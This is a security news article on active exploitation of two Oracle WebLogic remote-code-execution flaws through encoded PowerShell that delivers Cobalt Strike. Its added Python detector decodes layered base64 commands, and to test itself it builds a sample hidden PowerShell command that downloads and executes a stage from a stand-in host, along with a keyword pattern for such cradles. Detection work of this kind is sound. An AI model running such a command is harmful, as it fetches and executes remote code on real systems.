Attackers Exploiting Unpatched Oracle WebLogic Servers

Recently, attackers have been observed using new tricks as they actively scan for exposed Oracle WebLogic servers that are vulnerable to a recently disclosed unauthenticated RCE flaw.

Active exploitation of WebLogic servers

In the latest series of attacks, cybercriminals were seen actively scanning for Oracle WebLogic servers affected by the high-severity vulnerability CVE-2020-14882, which has a CVSS score of 9.8/10.
  • The details about the vulnerability were made publicly available only a few weeks ago.
  • Cybersecurity firm Spyse reported over 3,300 exposed Oracle WebLogic servers reachable over the public internet that were potentially vulnerable.
  • Further, attackers were also spotted exploiting a no-auth RCE vulnerability (CVE-2020-14750) to compromise unpatched WebLogic servers.
  • At the end of October, the SANS Internet Storm Center had also confirmed the active exploitation of these two vulnerabilities.

Modus operandi

  • Attackers allegedly deploy Cobalt Strike beacons, giving them persistent remote access to the compromised Oracle WebLogic servers.
  • The new campaign uses a chain of base64-encoded, obfuscated PowerShell scripts to download a Cobalt Strike payload.
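The layered base64 encoding described above is what a defender would look for in process-creation logs. The following is an added example, not code from the original article or from any vendor: it unwraps nested `-EncodedCommand` and `FromBase64String` layers from a command line and flags download-cradle keywords in the decoded script. The log lines, the `example.invalid` URL and the script text are constructed for the demonstration.

```python
import base64
import re

def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample: an inner download cradle wrapped in a second base64 layer,
# then passed as the -enc argument. Not taken from any real campaign.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
MIDDLE = ("IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
          + encode_ps(INNER) + "')))")
SAMPLE_LOGS = [
    "4688 New Process: cmd.exe /c powershell.exe -NoP -W Hidden -enc " + encode_ps(MIDDLE),
    "4688 New Process: powershell.exe -Command Get-Service",  # benign control line
]

ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
B64_CALL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|IEX|Invoke-Expression", re.I)

def decode_b64(blob: str) -> str:
    """Decode base64; treat the bytes as UTF-16LE when every other byte is mostly NUL."""
    raw = base64.b64decode(blob)
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")

def unwrap_layers(cmdline: str, max_depth: int = 5) -> list[str]:
    """Return each decoded script layer found in a command line, outermost first."""
    layers = []
    m = ENC_ARG.search(cmdline)
    if not m:
        return layers
    text = decode_b64(m.group(1))
    layers.append(text)
    while len(layers) < max_depth:          # depth limit guards against runaway nesting
        inner = B64_CALL.search(text)
        if not inner:
            break
        text = decode_b64(inner.group(1))
        layers.append(text)
    return layers

def analyse(line: str) -> dict:
    """Summarise one log line: number of encoding layers and whether a download cradle appears."""
    layers = unwrap_layers(line)
    return {"layers": len(layers),
            "download_cradle": any(CRADLE.search(layer) for layer in layers),
            "final_script": layers[-1] if layers else ""}

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        print(analyse(line))
```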

Warning and patches

  • Due to the widespread dissemination and evident active exploitation of these critical vulnerabilities, CISA released an alert urging users and administrators to apply the available patches.
  • A patch for CVE-2020-14882 was already released in the Oracle Critical Patch Update of October 2020.
  • Recently, Oracle issued a supplementary advisory for the remote code execution vulnerability (CVE-2020-14750) in the same WebLogic component.

Closing statement

Organizations running Oracle WebLogic Server are advised to patch both vulnerabilities as soon as possible. Additionally, experts recommend having an automated patch management process to reduce exposure to such threats in the future.